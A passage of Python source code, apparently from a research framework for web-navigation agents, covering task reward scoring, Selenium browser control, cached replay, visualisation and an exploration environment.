or len(self.demo_task.action_history) == 0 \
or len(self.action_history) == 0:
scores.append(0)
continue
match_scores = []
for demo_action in self.demo_task.action_history:
action_match_score = max([demo_action.match_score(action) for action in self.action_history])
match_scores.append(action_match_score)
for self_action in self.action_history:
action_match_score = max([self_action.match_score(action) for action in self.action_history])
match_scores.append(action_match_score)
task_len = len(self.demo_task.action_history) + len(self.action_history)
similarity_with_demo_actions = sum(match_scores) / task_len
scores.append(similarity_with_demo_actions)
elif reward_key in ["similarity_with_demo_surrounding"]:
if not self.demo_task:
scores.append(0)
continue
demo_surrounding = self.demo_task.get_entity_surrounding()
self_surrounding = self.get_entity_surrounding()
if not demo_surrounding or not self_surrounding:
scores.append(0)
continue
match_scores = []
for demo_entity in demo_surrounding:
match_score = max([
Utils.text_similarity(demo_entity, self_entity) *
Utils.words_similarity(demo_surrounding[demo_entity], self_surrounding[self_entity])
for self_entity in self_surrounding])
match_scores.append(match_score)
for self_entity in self_surrounding:
match_score = max([
Utils.text_similarity(demo_entity, self_entity) *
Utils.words_similarity(demo_surrounding[demo_entity], self_surrounding[self_entity])
for demo_entity in demo_surrounding])
match_scores.append(match_score)
task_len = len(self.demo_task.action_history) + len(self.action_history)
similarity_with_demo_surrounding = sum(match_scores) / task_len
scores.append(similarity_with_demo_surrounding)
elif reward_key in ["similarity_with_non_parameters"]:
non_entity_words = reward_item[1]
match_scores = []
for word in non_entity_words:
similarity = max([0.0] + [score for ele, score in query_word_matches[word] if ele in content_elements])
match_scores.append(similarity)
if not match_scores:
match_scores = [0.0]
similarity_with_non_parameters = np.mean(match_scores)
scores.append(similarity_with_non_parameters)
elif reward_key in ["similarity_with_parameters"]:
para_val = reward_item[1]
para_annotations = reward_item[2]
para_scores = [0.0]
for v1_ele, v1_score in query_word_matches[para_val]:
para_scores.append(v1_score)
for annotation in para_annotations:
for v2_ele, v2_score in query_word_matches[annotation]:
dist = 1 if v1_ele == v2_ele else (1 + v1_ele.get_shortest_distance(v2_ele) / 50)
para_score = v1_score + v1_score / dist
para_scores.append(para_score)
similarity_with_parameter = max(para_scores)
scores.append(similarity_with_parameter)
elif reward_key in ["distance_between_parameters"]:
entity1 = reward_item[1]
entity2 = reward_item[2]
dists = [0.0]
for v1_ele, v1_score in query_word_matches[entity1]:
for v2_ele, v2_score in query_word_matches[entity2]:
if v1_ele == v2_ele:
continue
dist = v1_score * v2_score / (2 + v1_ele.get_shortest_distance(v2_ele) / 50)
if v2_ele.center[0] >= v1_ele.center[0] and v2_ele.center[1] >= v1_ele.center[1]:
dist *= 1.2
dists.append(dist)
distance_between_parameters = max(dists)
scores.append(distance_between_parameters)
else:
scores.append(0)
return scores
def _evaluate(self):
self.reward, self.done, self.target_achieved = 0, False, False
last_state = self.state_history[-1] if len(self.action_history) > 0 else None
last_action = self.action_history[-1] if len(self.action_history) > 0 else None
if not self.state or not self.state.url_matches(self.included_url_res):
self.done = True
self.reward = 0 - self.total_reward
self.total_reward = 0
return
# If last action is not a submit action, clear all accumulated scores
if last_state and last_action \
and (not last_action.is_submit):
# remove below conditions because they will lead to "submit-clear confusion"
# and (not last_action.action_type == Action.SELECT) \
# and (last_state.url not in self.state.url):
self.scores = [0.0] * len(self.score_items)
current_scores = self.compute_scores()
self.scores = np.max([self.scores, current_scores], axis=0)
total_reward = np.sum(np.multiply(self.score_weights, self.scores))
self.reward = total_reward - self.total_reward
self.total_reward = total_reward
n_matches, n_max_matches = self._target_match_ratio()
if n_matches == n_max_matches and n_max_matches > 0:
self.target_achieved = True
if len(self.action_history) >= self.step_limit \
or (last_action and last_action.action_type == Action.FINISH) \
or len(self.state.possible_actions) == 0:
self.done = True
return
def get_entity_surrounding(self):
entity_surrounding = {}
for action in self.action_history:
if action.action_type in [Action.INPUT_TEXT, Action.SELECT]:
entity = action.value_text_parsed
if len(entity) > 50:
continue
surrounding_words = action.surrounding_words_parsed
entity_surrounding[entity] = surrounding_words
return entity_surrounding
def get_action_usefulness(self, action):
"""
Evaluate the action's usefulness to this task
:param action: the action to evaluate
:return: the match score between the action and this task
"""
if action.element is None:
return 0.0
scores = [0.01]
for i, word in enumerate(self.all_words_parsed):
similarity = Utils.text_similarity(word, action.value_text_parsed)
scores.append(similarity)
return max(scores)
def get_preferred_actions(self):
"""
get the list of preferred actions in the context of current task
:return:
"""
restrict_action_space = GLOBAL_CONFIGS['action_restriction']
w_spatial = REWARD_ITEM_WEIGHTS['action_spatial_distance']
w_directional = REWARD_ITEM_WEIGHTS['action_direction']
preferred_actions = []
visited_state_strs = [state.state_str for state in self.state_history] + [self.state.state_str]
interacted_action_clusters = set([action.norm_action_str for action in self.action_history])
inputted_words = []
pending_input_words = copy.copy(self.query_words)
for action in self.action_history:
if action.action_type in [Action.INPUT_TEXT, Action.SELECT]:
inputted_word = action.value
inputted_words.append(inputted_word)
if inputted_word in pending_input_words:
pending_input_words.remove(inputted_word)
interacted_elements, _ = self.state.interacted_elements(self.action_history)
last_state = self.state_history[-1] if len(self.state_history) > 0 else None
last_action = self.action_history[-1] if len(self.action_history) > 0 else None
for action in self.state.possible_actions:
# TODO: If run on cache, comment following
if action.norm_action_str in interacted_action_clusters:
continue
# if self.utg.is_ineffective(action, self.state):
# continue
#
# action_ineffective = False
# next_state_weights = self.utg.get_next_state_weights(action, self.state)
# if next_state_weights \
# and len(next_state_weights) == 1 \
# and list(next_state_weights.keys())[0] in visited_state_strs:
# total_weight = sum(next_state_weights.values())
# max_weight = max(next_state_weights.values())
# if float(max_weight) / total_weight > 0.8:
# for state_str in next_state_weights:
# if next_state_weights[state_str] >= max_weight and state_str in visited_state_strs:
# action_ineffective = True
# break
# if action_ineffective:
# continue
# Constrain to the same input type
if action.action_type == Action.INPUT_TEXT:
current_value = action.element.ele_dict["value"] if "value" in action.element.ele_dict else None
if action.value == current_value:
continue
if self.get_input_probability(action.value) < 0.8:
continue
if not action.element.accepts_text(action.value):
continue
input_value_type = Utils.get_text_type(action.value)
if current_value:
if current_value in self.query_words:
continue
current_value_type = Utils.get_text_type(current_value)
if input_value_type != current_value_type:
continue
# else:
# if "date" in action.element.own_text and input_value_type != "time":
# continue
# Each parameter should be inputted only once.
# Heuristics added 10/15/2019
if action.action_type in [Action.INPUT_TEXT, Action.SELECT]:
if action.value in inputted_words:
continue
# Restrict to the same form
if w_spatial != 0: # OR suggested heuristics: if w_spatial is 0, don't restrict action space.
if last_action is not None \
and last_action.element is not None \
and last_action.element.parent_form is not None \
and not last_action.is_submit:
# last action is in a form
last_form = last_action.element.parent_form
current_form = action.element.parent_form
if current_form is None:
continue
if current_form.xpath != last_form.xpath:
continue
# if action.action_type == Action.CLICK and not action.is_submit:
# continue
# make sure press_enter action is taken right after input_text on the same element
if action.action_type == Action.PRESS_ENTER:
if last_action is None or last_action.element is None:
continue
if action.element.xpath != last_action.element.xpath:
continue
if restrict_action_space and w_directional != 0:
# If this is not a new state, the next action should be on the right side of or below previous actions
is_excluded = False
for interacted_element in interacted_elements:
previous_x, previous_y = interacted_element.center
x, y = action.element.center
if x == previous_x and y == previous_y:
continue
if x <= previous_x and y <= previous_y:
is_excluded = True
break
if is_excluded:
continue
preferred_actions.append(action)
return preferred_actions
def get_reward_str(self):
return "reward:%.2f total:%.2f scores:%s" % \
(self.reward, self.total_reward, ",".join(["%.2f" % s for s in self.scores]))
def get_tasklet(self):
pretty_trace = []
replay_trace = []
for i, action in enumerate(self.action_history):
reward, total_reward, scores = self.reward_history[i]
reward_str = "reward:%.2f total:%.2f scores:%s" % \
(reward, total_reward, ",".join(["%.2f" % s for s in scores]))
pretty_trace.append("%s, %s" % (action, reward_str))
replay_trace.append(action.replay_api)
success = self.target_achieved
report = "task:%s\n total_reward:%.2f success:%s\n" \
" score_items:\n\t%s\n pretty_trace:\n\t%s\n replay_trace:\n\t%s\n" % \
(self.task_str,
self.total_reward,
"Y" if success else "N",
"\n\t".join(
["%d. %.1f * %s" % (i, self.score_weights[i], item) for i, item in enumerate(self.score_items)]),
"\n\t".join(pretty_trace),
"\n\t".join(replay_trace))
return report
@staticmethod
def get_replay_trace_from_tasklet(tasklet):
replay_trace_offset = tasklet.find("replay_trace:") + 13
replay_trace_str = tasklet[replay_trace_offset:]
replay_trace = []
for line in replay_trace_str.splitlines():
line = line.strip()
if len(line) == 0:
continue
replay_trace.append(line)
return replay_trace
@staticmethod
def get_total_reward_from_tasklet(tasklet):
reward_line_re = r"total_reward:(\S+) success:"
m = re.search(reward_line_re, tasklet)
if m:
reward_str = m.group(1)
return float(reward_str)
else:
return None
def _target_match_ratio(self):
necessary_action_triples = Utils.parse_actions_to_triples(self.necessary_actions)
n_max_matches = len(self.target_text_res) + len(self.target_url_res) + len(necessary_action_triples)
if n_max_matches == 0:
# target not specified. Use the demonstration actions to identify success
necessary_action_triples = Utils.parse_actions_to_triples(self.demonstration)
n_max_matches = len(necessary_action_triples)
n_matches = 0
for target_text_re in self.target_text_res:
if re.search(target_text_re, self.state.text_in_window, re.IGNORECASE) \
or target_text_re in self.state.text_in_window:
n_matches += 1
for target_url_re in self.target_url_res:
if re.search(target_url_re, self.state.url, re.IGNORECASE) or target_url_re in self.state.url:
n_matches += 1
for action_type, value, target_locator_re in necessary_action_triples:
last_action_on_target = None
for action in self.action_history:
if action.action_type != action_type:
continue
if action.element is None:
continue
if action.element.locator is None:
continue
for target_locator_re_seg in target_locator_re.split(" || "):
if target_locator_re_seg in action.element.locator:
last_action_on_target = action
break
if last_action_on_target and last_action_on_target.value == value:
n_matches += 1
return n_matches, n_max_matches
def _is_visited(self, state):
for visited_state in self.state_history:
if state.same_as(visited_state):
return True
return False
def to_dict(self, as_demo=False):
if as_demo:
return {
"start_url": self.start_url,
"query_words": self.query_words,
"query_annotations": self.query_annotations,
"target_text_res": self.target_text_res,
"target_url_res": self.target_url_res,
"target_url": self.target_url,
"necessary_actions": self.necessary_actions,
"demonstration": self.demonstration
}
else:
return {
"start_url": self.start_url,
"step_limit": self.step_limit,
"query_words": self.query_words,
"query_annotations": self.query_annotations,
"in_window_only": self.in_window_only,
"included_url_res": self.included_url_res,
"target_url_res": self.target_url_res,
"target_text_res": self.target_text_res,
"target_state_str": self.target_state_str,
"demonstration": self.demonstration,
# "coverage": self.get_coverage(),
"state_history": [state.state_str for state in self.state_history],
"action_history": [action.replay_api for action in self.action_history],
"state": self.state.state_str,
"reward": self.reward,
"total_reward": self.total_reward,
"done": self.done,
"target_achieved": self.target_achieved
}
def save(self, task_dir, save_utg=False, overwrite=False, as_demo=False):
if not task_dir:
return
if not os.path.exists(task_dir):
os.makedirs(task_dir)
task_file_path = os.path.join(task_dir, self.name + "task.json")
if os.path.exists(task_file_path) and not overwrite:
self.name = self.name + "_"
self.utg.name = self.name
self.save(task_dir, save_utg)
else:
task_json_file = open(os.path.join(task_dir, self.name + "task.json"), "w")
json.dump(self.to_dict(as_demo=as_demo), task_json_file, indent=2)
task_json_file.close()
for state in self.state_history + [self.state]:
state.save(state_dir=os.path.join(task_dir, "states"))
if save_utg:
self.utg.save(task_dir)
def load_utg(self, task_path):
task_dir = os.path.dirname(task_path)
task_name = os.path.basename(task_path)[:-len("task.json")]
self.utg = UTG.load_from_dir(utg_dir_path=os.path.join(task_dir, task_name + "utg.js"))
self.utg.states_dir = os.path.join(os.path.dirname(task_path), "states")
@staticmethod
def load(task_path, load_utg=False):
if not task_path.endswith("task.json") or not os.path.exists(task_path):
return None
task_dir = os.path.dirname(task_path)
task_name = os.path.basename(task_path)[:-len("task.json")]
task_json_file = open(task_path)
task_dict = json.load(task_json_file)
task_json_file.close()
task = Task(name=task_name, **task_dict)
if load_utg:
task.utg = UTG.load_from_dir(utg_dir_path=os.path.join(task_dir, task_name + "utg.js"))
task.utg.states_dir = os.path.join(os.path.dirname(task_path), "states")
if "state_history" in task_dict and "action_history" in task_dict:
task.reward = task_dict["reward"]
task.total_reward = task_dict["total_reward"]
task.done = task_dict["done"]
task.target_achieved = task_dict["target_achieved"]
states_str = os.path.join(task_dir, "states")
for i in range(len(task_dict["state_history"])):
state_str = task_dict["state_history"][i]
action_replay_api = task_dict["action_history"][i]
state = State.load(state_dir=states_str, state_str=state_str)
state.setup(task)
action = state.get_action(action_replay_api)
task.state_history.append(state)
task.action_history.append(action)
task.state = State.load(state_dir=states_str, state_str=task_dict["state"])
task.state.setup(task)
return task
@staticmethod
def load_tasks(task_path, load_utg=False):
tasks = []
if not task_path:
return tasks
if os.path.isdir(task_path):
for file_name in os.listdir(task_path):
if file_name.endswith("task.json"):
task = Task.load(task_path=os.path.join(task_path, file_name), load_utg=load_utg)
if task:
tasks.append(task)
if file_name.endswith("taskset.json"):
tasks.extend(Task.load_tasks(task_path=os.path.join(task_path, file_name), load_utg=load_utg))
elif task_path.endswith("task.json"):
tasks.append(Task.load(task_path=task_path, load_utg=load_utg))
elif task_path.endswith("taskset.json"):
taskset_name = os.path.basename(task_path)[:-len("taskset.json")]
taskset_json_file = open(task_path)
taskset_dict = json.load(taskset_json_file)
taskset_json_file.close()
start_urls = taskset_dict["start_urls"] if "start_urls" in taskset_dict else []
task_dicts = taskset_dict["tasks"]
for task_key in task_dicts:
task_dict = task_dicts[task_key]
task_urls = [task_dict.pop("start_url")] if "start_url" in task_dict else start_urls
for task_url in task_urls:
task_host = Utils.get_host(url=task_url)
task_name = "%s_%s_%s_" % (taskset_name, task_key, task_host)
task = Task(name=task_name, start_url=task_url, **task_dict)
tasks.append(task)
return tasks
ACTION_RE = r"(\S+) #(.*)# @ (.+)"
ACTION_DEMO_SAVE = "Shift+S"
ACTION_DEMO_CURRENT = "Shift+C"
ACTION_DEMO_NEXT = "Shift+N"
ACTION_DEMO_QUIT = "Shift+Q"
class ChromeBrowser:
def __init__(self, wait=1.0, proxy=None, mobile=False, headless=False, restart_reset=False,
chrome_path=None, extension_path=None, **kwargs):
self.logger = logging.getLogger("Browser")
self.wait = wait
self.mobile = mobile
self.headless = headless
self.restart_reset = restart_reset
self.window_width = 1200
self.window_height = 1200
# Specify window size
if self.mobile:
self.window_width = 540
self.window_height = 960
webbot_js_path = os.path.abspath(os.path.join(".", "resources", "webbot.js"))
self.webbot_js = "".join(open(webbot_js_path).readlines())
self._chrome_options = webdriver.ChromeOptions()
# Specify window size
if self.mobile:
mobile_emulation = {
"deviceMetrics": {"width": self.window_width, "height": self.window_height},
"userAgent": "Mozilla/5.0 (Linux; Android 4.2.1; en-us; "
"Nexus 5 Build/JOP40D) AppleWebKit/535.19 (KHTML, like Gecko) "
"Chrome/18.0.1025.166 Mobile Safari/535.19"
}
self._chrome_options.add_experimental_option("mobileEmulation", mobile_emulation)
else:
self._chrome_options.add_argument("--window-size=%d,%d" % (self.window_width, self.window_height))
self._chrome_options.add_argument("--disable-notifications")
self._chrome_options.add_argument('--no-sandbox')
self._chrome_options.add_argument('--disable-dev-shm-usage')
if chrome_path is not None:
self._chrome_options.binary_location(chrome_path)
if extension_path is not None:
print("Loading extension")
# extension_path = "~/AppData/Local/Google/Chrome/User Data/Default/Extensions/chrome_extension/"
# self._chrome_options.add_argument("โ-load-extension=%s" % extension_path)
# extension_path = "/mnt/f/Appstract_android/webRL/tests/chrome-extension.crx"
self._chrome_options.add_extension(extension_path)
else:
self.logger.debug("no extension to load ---------------------------------------")
# Headless chrome doesn"t support extensions
if headless:
self._chrome_options.add_argument("--headless")
# Use proxy
if proxy:
self._chrome_options.add_argument("--proxy-server=%s" % proxy)
self._chrome_options.add_argument("--proxy-bypass-list=localhost")
self.driver = None
self.root_window = None
self.setup()
def setup(self):
capabilities = DesiredCapabilities().CHROME
capabilities["pageLoadStrategy"] = "normal" # complete
# capabilities["pageLoadStrategy"] = "eager" # interactive, NOTE: not supported
# capabilities["pageLoadStrategy"] = "none"
capabilities["loggingPrefs"] = {"browser": "ALL"}
system = platform.system()
if "Microsoft" in platform.release():
chromedriver_path = os.path.abspath(os.path.join(".", "resources", "chromedriver_win32.exe"))
elif system == "Windows":
chromedriver_path = os.path.abspath(os.path.join(".", "resources", "chromedriver_win32.exe"))
elif system == "Linux":
chromedriver_path = os.path.abspath(os.path.join(".", "resources", "chromedriver_linux64"))
elif system == "Darwin":
chromedriver_path = os.path.abspath(os.path.join(".", "resources", "chromedriver_max64"))
else:
self.logger.warning("Unsupported system: %s" % system)
sys.exit(-1)
self.driver = webdriver.Chrome(
chrome_options=self._chrome_options,
desired_capabilities=capabilities,
executable_path=chromedriver_path)
self.driver.implicitly_wait(10)
self.driver.set_page_load_timeout(10)
self.root_window = self.driver.current_window_handle
self._resize_window()
#test for extension
#self.driver.get('https://bing.com')
#try:
# time.sleep(3)
# header = self.driver.find_element_by_id('installed')
# print('Success! :-)')
#except NoSuchElementException:
# print('Failure! :-(')
#finally:
# self.driver.quit()
def _resize_window(self):
if self.mobile:
return
cmd = "return [window.outerWidth-window.innerWidth, window.outerHeight-window.innerHeight];"
padding = self.driver.execute_script(cmd)
expected_window_size = [self.window_width + padding[0], self.window_height + padding[1]]
self.driver.set_window_size(width=expected_window_size[0], height=expected_window_size[1])
def _check_webbot_present(self):
cmd = "return window.ylController != undefined;"
try:
if self.driver.execute_script(cmd):
return True
except:
pass
self.driver.execute_script(self.webbot_js)
# time.sleep(2)
is_present = self.driver.execute_script(cmd)
assert is_present
return True
def _execute_script(self, cmd, *args):
self._check_webbot_present()
return self.driver.execute_script(cmd, args)
def _take_screenshot(self):
screenshot = self.driver.get_screenshot_as_png()
screenshot = Image.open(BytesIO(screenshot))
return screenshot
def _zoom_page(self, ratio=0.9):
script = "document.body.style.zoom=%s;" % ratio
return self.driver.execute_script(script)
def _get_state_from_json(self, state_json):
try:
state_dict = json.loads(state_json)
screenshot = self._take_screenshot()
state = State(state_dict=state_dict, screenshot=screenshot)
return state
except Exception:
self.logger.warning("_get_state_from_json failed.")
return None
def get_current_state(self):
try:
cmd = "return window.ylController.getStateJson();"
state_json = self._execute_script(cmd)
state = self._get_state_from_json(state_json)
return state
except TimeoutException:
self.logger.warning("get_current_state timeout")
return None
def perform_action(self, action):
target_locator = action.element.locator if action.element else None
return self.perform_action_by_locator(action.action_type, action.value, target_locator)
def _filter_actions(self, current_state, actions):
filtered_actions = actions
return filtered_actions
def locate_element(self, locator):
xpaths = locator.split(" || ")
for xpath in xpaths:
try:
target_element = self.driver.find_element_by_xpath(xpath)
if isinstance(target_element, WebElement):
return target_element
except Exception:
pass
self.logger.warning("Unable to locate element: %s" % locator)
def perform_action_by_locator(self, action_type, value, target_locator):
success = True
try:
if action_type == Action.FINISH:
return success
target_element = self.locate_element(target_locator)
xpath = target_locator.split(" || ")[0]
if action_type == Action.CLICK:
try:
target_element.click()
except:
self.logger.warning("Selenium failed to perform click, using JS instead. %s" % xpath)
action_dict = {
"action_type": "click",
"target_locator": xpath,
"value": value
}
self._execute_script("window.ylController.performActionJson(arguments[0]);",
json.dumps(action_dict))
elif action_type == Action.CHECK:
try:
target_element.click()
except:
self.logger.warning("Selenium failed to perform check, using JS instead. %s" % xpath)
action_dict = {
"action_type": "check",
"target_locator": xpath,
"value": value
}
self._execute_script("window.ylController.performActionJson(arguments[0]);",
json.dumps(action_dict))
elif action_type == Action.SELECT:
try:
selected_index = int(value)
target_select = Select(target_element)
target_select.select_by_index(selected_index)
except:
self.logger.warning("Selenium failed to perform select, using JS instead. %s" % xpath)
action_dict = {
"action_type": "check",
"target_locator": xpath,
"value": value
}
self._execute_script("window.ylController.performActionJson(arguments[0]);",
json.dumps(action_dict))
elif action_type == Action.INPUT_TEXT:
try:
target_element.clear()
time.sleep(0.5)
target_element.send_keys(value)
except:
self.logger.warning("Selenium failed to perform input, using JS instead. %s" % xpath)
action_dict = {
"action_type": "setValue",
"target_locator": xpath,
"value": value
}
self._execute_script("window.ylController.performActionJson(arguments[0]);",
json.dumps(action_dict))
elif action_type == Action.PRESS_ENTER:
target_element.send_keys(Keys.ENTER)
else:
self.logger.warning("Cannot perform action %s" % action_type)
time.sleep(self.wait)
if Utils.get_host(self.driver.current_url) in LONG_WAIT_HOSTS:
time.sleep(3)
except TimeoutException:
self.logger.warning("perform_action_by_locator timeout")
pass
except Exception as e:
self.logger.warning("perform_action_by_locator failed: %s, locator: %s" %
(str(e).splitlines()[0], target_locator))
success = False
self.driver.switch_to.window(self.driver.window_handles[-1])
return success
def start_log_server(self):
import threading
if sys.version_info[0] == 2:
from BaseHTTPServer import SimpleHTTPRequestHandler, HTTPServer
else:
from http.server import SimpleHTTPRequestHandler, HTTPServer
class MyHandler(SimpleHTTPRequestHandler):
def do_POST(self):
content_length = int(self.headers['Content-Length']) # Gets the size of data
post_data = self.rfile.read(content_length) # Gets the data itself
log_line = post_data.decode("utf-8") if isinstance(post_data, bytes) else str(post_data)
outer.log_lines.append(log_line)
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.send_header('Access-Control-Allow-Origin', '*')
self.end_headers()
self.wfile.write(b"OK")
outer = self
self.log_lines = []
self.log_server = HTTPServer(("", 7336), MyHandler)
def start_log_server():
self.log_server.serve_forever()
self.log_server_thread = threading.Thread(target=start_log_server)
self.log_server_thread.setDaemon(True)
self.log_server_thread.start()
time.sleep(1)
def stop_log_server(self):
if hasattr(self, "log_server") and self.log_server:
self.log_server.shutdown()
self.log_server_thread.join(0)
def get_log(self, through_console=False):
if through_console:
log_lines = []
log_entries = self.driver.get_log("browser")
for log_entry in log_entries:
message = log_entry["message"]
m = re.match(r"console-api \d+:\d+ \"WebBot (.+)\"", message)
if m:
log_lines.append(m.group(1).replace('\\"', '\"'))
return log_lines
if hasattr(self, "log_lines"):
r = self.log_lines.copy()
self.log_lines.clear()
return r
return []
def reset(self, url, restart=False):
if url.startswith("miniwob"):
rel_path = os.path.join("resources", "miniwob", url[len("miniwob_"):])
url = "file:///" + os.path.abspath(rel_path)
if self.restart_reset or restart or Utils.get_host(url) in RESTART_HOSTS:
self.close()
self.setup()
else:
try:
self.driver.delete_all_cookies()
self.driver.execute_script("window.localStorage.clear();")
self.driver.execute_script("window.sessionStorage.clear();")
except Exception:
pass
# self.logger.warning("Failed to clear cookie, session, or localStorage (ignored).")
try:
if self.root_window not in self.driver.window_handles:
self.root_window = self.driver.window_handles[0]
for window_handle in self.driver.window_handles:
if window_handle == self.root_window:
continue
self.driver.switch_to.window(window_handle)
self.driver.close()
self.driver.switch_to.window(self.root_window)
except Exception:
self.logger.warning("Failed to switch window, restarting browser.")
self.close()
self.setup()
try:
self._resize_window()
self.driver.get(url)
time.sleep(self.wait)
url_host = Utils.get_host(url)
if url_host in LONG_WAIT_HOSTS:
time.sleep(3)
if "demo.openmrs.org" in url_host:
script = '''
document.getElementById("username").value = "admin";
document.getElementById("password").value = "Admin123"
document.getElementById("Pharmacy").click();
document.getElementById("loginButton").click();'''
self._execute_script(script)
time.sleep(self.wait)
return True
except Exception as e:
self.logger.warning("Failed to resize window or open url: %s" % e)
return False
def close(self):
if self.driver:
self.driver.quit()
class CacheBrowser:
def __init__(self, utgs, name=None, **kwargs):
self.name = name if name else ""
self.logger = logging.getLogger("CacheBrowser(%s)" % self.name)
self.window_width = 1200
self.window_height = 1200
self._state_cache = {}
self.utgs = utgs
self.current_utg = None
self.current_state_str = None
self.use_fake_state = False
def _get_state(self, state_str):
if state_str not in self._state_cache:
state = self.current_utg.get_state(state_str)
self._state_cache[state_str] = state
return self._state_cache[state_str]
def get_current_state(self):
return self._get_state(self.current_state_str)
def perform_action(self, action):
if action.action_type == Action.FINISH:
return True
current_state = self.get_current_state()
next_state_weights = self.current_utg.get_next_state_weights(action, current_state)
if next_state_weights:
self.current_state_str = Utils.weighted_choice(next_state_weights)
return True
# elif action.action_type in [Action.SELECT, Action.INPUT_TEXT]:
if self.use_fake_state:
fake_state = Utils.create_fake_state(current_state, action)
if fake_state is not None:
fake_state_str = fake_state.state_str
if fake_state_str not in self.current_utg.G.nodes:
self._state_cache[fake_state_str] = fake_state
self.logger.warning("perform_action: fake state unseen")
else:
self.logger.warning("perform_action: fake state matched actual state")
self.current_state_str = fake_state_str
return True
self.logger.warning("perform_action: cache miss with action: %s", action)
self.current_state_str = self.current_utg.get_init_state_str()
return False
def _filter_actions(self, current_state, actions):
filtered_actions = []
for action in actions:
if self.current_utg.get_next_state_weights(action, current_state):
filtered_actions.append(action)
return filtered_actions
def reset(self, url, **kwargs):
self.current_utg = None
for utg in self.utgs:
if utg.start_url == url:
self.current_utg = utg
break
if self.current_utg is None:
self.logger.warning("reset: cache miss with url: %s" % url)
return False
self.current_state_str = self.current_utg.get_init_state_str()
return True
def close(self):
pass
class TaskCanvas:
def __init__(self, title=None, state_size=None):
self.title = title if title else "TaskCanvas"
self.padding = 50
if state_size is None:
state_size = [256, 256]
self.state_width, self.state_height = state_size
canvas_w = self.state_width * 2 + self.padding
canvas_h = self.state_height + self.padding
if sys.version_info[0] < 3:
import Tkinter as tkinter
else:
import tkinter
self.tk = tkinter.Tk()
self.tk.geometry("%dx%d+0+0" % (canvas_w, canvas_h))
self.tk.title(self.title)
self.canvas = tkinter.Canvas(self.tk, bg="white", width=canvas_w, height=canvas_h)
self.canvas.pack()
self.__canvas_tmp_objs = []
def render_task(self, task):
assert isinstance(task, Task)
try:
c = self.canvas
for obj in self.__canvas_tmp_objs:
c.delete(obj)
if len(task.state_history) > 0:
state1 = task.state_history[-1]
screen = state1.screenshot.resize([self.state_width, self.state_height], Image.ANTIALIAS)
img1 = ImageTk.PhotoImage(screen)
img1_ = c.create_image(0, 0, anchor="nw", image=img1)
self.__canvas_tmp_objs.append(img1_)
if task.state:
state2 = task.state
screen = state2.screenshot.resize([self.state_width, self.state_height], Image.ANTIALIAS)
img2 = ImageTk.PhotoImage(screen)
img2_ = c.create_image(self.state_width + self.padding, 0, anchor="nw", image=img2)
self.__canvas_tmp_objs.append(img2_)
if len(task.action_history) > 0:
action = task.action_history[-1]
text1 = c.create_text(self.state_width + self.padding / 2,
self.state_height + self.padding / 2,
anchor="center",
text="task:%s \t action:%s \t reward:%d" %
(task.name, action.action_type, task.reward))
self.__canvas_tmp_objs.append(text1)
arrow1 = c.create_line(self.state_width, self.state_height / 2,
self.state_height + self.padding, self.state_height / 2,
arrow="last", width=4.0)
self.__canvas_tmp_objs.append(arrow1)
if action.element:
ele_bound = action.element.get_resized_bound(new_width=self.state_width,
new_height=self.state_height)
bbox1 = c.create_rectangle(ele_bound["left"], ele_bound["top"],
ele_bound["right"], ele_bound["bottom"],
outline="red", width=2.0)
self.__canvas_tmp_objs.append(bbox1)
self.tk.update()
except:
traceback.print_exc()
def destroy(self):
self.tk.destroy()
class WebBotEnv:
def __init__(self, browser, tasks, visualize=False, **kwargs):
self.logger = logging.getLogger("WebBotEnv")
self.browser = browser
self.tasks = tasks
self.visualize = visualize
self.canvas = TaskCanvas() if self.visualize else None
self.current_task = None
def render(self):
if self.visualize and self.canvas:
self.canvas.render_task(self.current_task)
# self.logger.info(f" number of actions in current state: {len(self.current_task.state.possible_actions)}")
def step(self, action):
"""
Take an action in current environment.
:param action: the action to take
:return: new_state, reward, done
"""
state = None
try:
# action_success = self.browser.perform_action(action)
# state = self.get_state() if action_success else None
success = self.browser.perform_action(action)
state = self.get_state() if success else None
except Exception:
self.logger.warning("step failed: %s" % action)
traceback.print_exc()
reward, done = self.current_task.update(action, state)
return state, reward, done
def explore(self, n_episodes=50, output_dir=None, policy="random", save_utg=False):
try:
if output_dir and save_utg:
for task in self.tasks:
task.utg.states_dir = os.path.join(output_dir, "states")
for episode in range(1, n_episodes + 1):
self.reset()
task = self.current_task.snapshot()
self.logger.info("Episode %d/%d, task: %s" % (episode, n_episodes, task.task_str))
while True:
if task.done:
break
self.render()
preferred_actions = task.get_preferred_actions()
possible_actions = task.state.possible_actions
if len(possible_actions) == 0:
break
if len(preferred_actions) == 0:
preferred_actions = possible_actions
if policy == "similarity":
action_scores = {}
for action in preferred_actions:
action_scores[action] = task.get_action_usefulness(action)
action = Utils.weighted_choice(action_scores)
elif policy == "random":
action = random.choice(possible_actions)
elif policy == "random_restricted":
action = random.choice(preferred_actions)
elif policy == "demo_biased":
actions_in_demo = []
for action in preferred_actions:
if action.replay_api in task.demonstration:
actions_in_demo.append(action)
rand = random.uniform(0, 1)
if len(actions_in_demo) > 0 and rand < 0.5:
action = random.choice(actions_in_demo)
else:
action = random.choice(preferred_actions)
else:
action = random.choice(possible_actions)
self.step(action)
task_ = self.current_task.snapshot()
task = task_
self.logger.info("\tExplore, action:%s, %s" % (action, task.get_reward_str()))
if output_dir and episode % 50 == 0:
task.save(task_dir=output_dir, save_utg=save_utg, overwrite=True)
except KeyboardInterrupt:
self.logger.info("Keyboard interrupt.")
pass
except Exception as e:
self.logger.warning("gen_utg failed: %s" % e)
traceback.print_exc()
def get_state(self):
try:
state = self.browser.get_current_state()
if state:
state.setup(self.current_task)
return state
except Exception as e:
self.logger.error("get_state failed with error: %s" % e)
return None
def reset(self, new_task=None):
# Switch to a random task
self.current_task = new_task if new_task else random.choice(self.tasks)
self.browser.reset(self.current_task.start_url)
retry_count = 0
while True:
state = self.get_state()
if state and len(state.possible_actions) > 0:
break
retry_count += 1
if retry_count == 2:
self.logger.warning("reset failed, restarting browser: %s." % self.current_task.start_url)
self.browser.reset(self.current_task.start_url, restart=True)
continue
if retry_count > 3:
self.logger.warning("reset failed: %s." % self.current_task.start_url)
break
self.current_task.reset(state)
return state
def _listen_actions(self):
def parse_action_lines(lines):
lines_parsed = []
last_line, last_action_type, last_target_locator = None, None, None
last_output_ele = None
for line in lines:
m = re.match(ACTION_RE, line)
if m:
action_type, value, target_locator = m.group(1), m.group(2), m.group(3)
if last_action_type == Action.INPUT_TEXT and \
(action_type != last_action_type or target_locator != last_target_locator):
lines_parsed.append(last_line)
if action_type == Action.FINISH:
